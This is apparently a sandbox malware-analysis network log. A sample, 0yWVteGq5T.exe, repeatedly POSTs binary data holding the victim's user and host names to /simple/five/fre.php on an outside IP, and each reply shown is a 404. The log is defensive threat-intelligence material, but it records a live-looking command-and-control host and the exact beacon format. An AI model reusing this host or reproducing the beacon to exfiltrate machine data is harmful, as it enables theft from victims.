Dec 9, 2024 08:52:41.529352903 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:42.964554071 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:42 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	49873	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:43.227236986 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:43.346920967 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:44.776232004 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:44 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	49879	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:45.035027981 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:45.154565096 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:46.592494965 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:46 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	49885	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:46.863600016 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:46.983185053 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:48.268328905 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:48 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	49888	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:48.539252043 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:48.658726931 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:50.978399992 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:50 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	49896	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:51.237061977 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:51.358824968 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:52.650873899 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:52 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	49900	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:52.908112049 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:53.027579069 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:54.731537104 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:54 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	49906	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:54.989228964 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:55.108776093 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:56.395785093 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:56 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	49911	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:56.670968056 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:56.790419102 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:52:58.223550081 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:57 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	49917	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:52:58.490883112 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:52:58.611498117 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:53:00.043214083 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:52:59 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	49924	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:53:00.300306082 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:53:00.419701099 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:53:01.856334925 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:53:01 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	49929	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:53:02.125020027 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:53:02.244479895 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:53:03.676702023 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:53:03 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.6	49935	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:53:03.944591999 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:53:04.064838886 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:53:05.342324972 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:53:05 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	49937	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:53:05.612095118 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:53:05.731668949 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:53:07.013528109 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:53:06 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	49943	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:53:07.285778999 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:53:07.405384064 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:53:08.848110914 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:53:08 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	49949	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:53:09.112591982 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:53:09.232228994 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:53:10.512737036 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:53:10 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.6	49954	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:53:10.769613981 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:53:10.889178038 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:53:12.323381901 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:53:12 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	49960	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:53:12.583204985 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:53:12.702697039 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:53:14.137646914 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:53:13 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.6	49962	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:53:14.398693085 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:53:14.518188953 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:53:15.952080965 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:53:15 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.6	49968	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:53:16.225502968 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:53:16.345760107 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:53:17.623614073 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:53:17 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.6	49973	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:53:17.899074078 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:53:18.018611908 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:53:19.453425884 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:53:19 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.6	49978	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:53:19.736536980 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:53:19.857048035 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
